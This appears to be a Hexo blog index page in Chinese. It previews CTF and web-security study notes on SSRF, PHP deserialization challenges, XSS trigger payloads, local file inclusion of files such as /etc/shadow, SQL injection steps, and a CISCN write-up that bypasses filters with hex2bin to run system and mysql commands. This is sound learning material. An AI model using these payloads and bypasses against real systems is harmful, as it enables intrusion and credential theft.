Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick StartCreate a new post1$ hexo new "My New Post"
More info: Writing
Run server1$ hexo server
More info: Server
Generate static files1$ hexo generate
More info: Generating
Deploy to remote sites1$ hexo deploy
More info: Deployment
ssrf漏洞
SSRF漏洞一.前置知识NATSSRF:service side request forgery服务器请求伪造
NAT: Network Address Transition 网络地址转换
静态NAT地址转换:内网转化为公网ip
NAT端口映射:通过防火墙NAT可以实现把私网ip端口映射到公网ip端口访问
curl函数三件套
curl_init:初始化一个Curl会话,里面一般是放URL地址,也可以放在curl_setopt里面的选项内
curl_setopt:设置curl会话的选项,比如CURLOPT_HEADER, 0表示将头文件的信息作为数据流输出
CURLOPT_RETURNTRANSFER,1将curl_exec()获取的信息以文件流的形式返回,而不是直接输出。
curl_exec:执行curl会话
curl_close:关闭curl会话
二.SSRF漏洞原理SSRF:service side request forgery服务器请求伪造
攻击目标是从外网无法访问的内部系统
形成原因:服务端提供了从服务器其他应用获取数据的功能
攻击方式:
三.伪协议信息搜集s ...
7.15刷题
7.15刷题[MRCTF2020]Ezpop1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var);#1 $var=p ...
7.13刷题
7.13刷题[NewStarCTF 公开赛赛道]UnserializeOne12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758<?phperror_reporting(0);highlight_file(__FILE__);#Something useful for you : https://zhuanlan.zhihu.com/p/377676274class Start{ public $name; protected $func; public function __destruct()#12当一个对象被销毁时,__destruct() 方法会被调用 { echo "Welcome to NewStarCTF, ".$this->name;#11__toString() 方法会被自动调用 } public ...
XSS漏洞
XSS跨站脚本攻击漏洞一、常见触发标签无过滤情况1.<script><scirpt>alert("xss");</script>
2.<img>当图片加载错误时触发
<img src="x" onerror=alert(1)><img src="1" onerror=eval("alert('xss')")>
还可以改成onmouseover=”alert(1)” onmouseout=”alert(1)”
3.<a>123456<a href="https://www.qq.com">qq</a><a href=javascript:alert('xss')>test</a> 不是触发性的动作需要加前缀javascript:<a href="javascript:a" onm ...
php反序列化
PHP反序列化漏洞一、基础知识php面向对象的基本概念类与对象
12345678910111213class hero{ var $name; #var默认是public public $sex; function(){ echo $this->name; #必须用this访问类内变量 }}$cyj= new hero();$cyj->name='chengyaojin'; #注意不是.访问$cyj->sex='male';$cyj->function();print_r($cyj); ->输出name和sex
public:任何地方调用
protected:外部不允许调用
private:子类、外部不允许调用
php中的继承:class hero2 extends hero{...}
PHP序列化:对象->字符串1234567891011121314151617null -> N;666 -> i: ...
春秋ctf夏季赛wp
春秋ctf夏季赛wpweb1 ctf日记wp-login.php
文件包含漏洞
文件包含一、文件包含漏洞的原理以PHP为例,常用的文件包含函数有以下四种include(),require(),include_once(),require_once()
123<?php include $_GET['test'];?>
include()函数并不在意被包含的文件是什么类型,只要有php代码,都会被解析出来。?test=phpinfo();
因此可以配合文件上传漏洞上传一个图片马,配合文件包含漏洞解析
文件包含不支持通配符
二、本地文件包含漏洞(LFI)1234<?php $file=$_GET['filename']; include($file);?>
直接更改filename可以读取本地文件
123456789Linux/Unix系统敏感文件:/etc/password //账户信息/etc/shadow //账户密码信息/usr/local/app/apache2/conf/httpd.conf //Apache2默认配置文件/usr/local/app/apache2/conf/e ...
sql注入总结
sql注入一.什么是注入所谓SQL注入,就是通过把SQL命令插入到WEB表单提交或输入域名或页面请求的查询字符串,最终到达欺骗服务器执行恶意的SQL命令,从而进一步得到相应的数据信息。通过构造一条精巧的语句,来查询到想要得到的信息。
二.常规注入步骤1.判断注入点类型提交and 1=1和and 1=2,如果两个都能正常显示则为字符型注入,如果1=2无法正常显示则为数字型注入
还有一种判断方法是使用2-1,看页面是否正常显示,数字型可以计算2-1所以会正常显示,字符型会报错(这种方法的优点是绕过对=号的检查)
确定是字符型后需要尝试闭合查询语句,例如),',",可以根据报错语句闭合,然后在最后加上#或–+注释掉之后的语句,正确的闭合方式表现为:加注释之前为错误界面,加注释符之后为正确页面
2.判断列数二分法判断列数,?id=1 group by 5或?id=1 order by 5,如果到某个数字恰好页面能正常显示,那么可以确定列数
3.union联合注入根据2拿到的列数构造查询语句(注:把id改成0、-1)?id=-1 union se ...
ciscn-wp
ciscn writeupwebsimple_php(复现)解法一比赛的时候一直在尝试其他命令,看了wp才发现能用php -r ‘代码’来执行php语句或者系统命令
与此相似的还有php -i可以查看phpinfo等等
但是由于题目过滤了许多关键字,我们可以利用hex2bin转码绕过过滤
hex2bin(‘语句’); 但是由于过滤了引号,使用substr截取一个字符(这里是下划线),剩下的就会被识别为字符串
hex编码 ls / -> 6c73202f
1php -r system(hex2bin(substr(_6c73202f,1)));
命令成功执行
之后找了一圈没发现flag,ps -def指令可以查看进程
ps -def -> _7073202d646566
其中看到了mysql,flag应该在数据库中
直接猜账户root密码为root, -e执行sql语句
12mysql -u root -p'root' -e 'show databases;'cmd=php -r system(hex2bin(su ...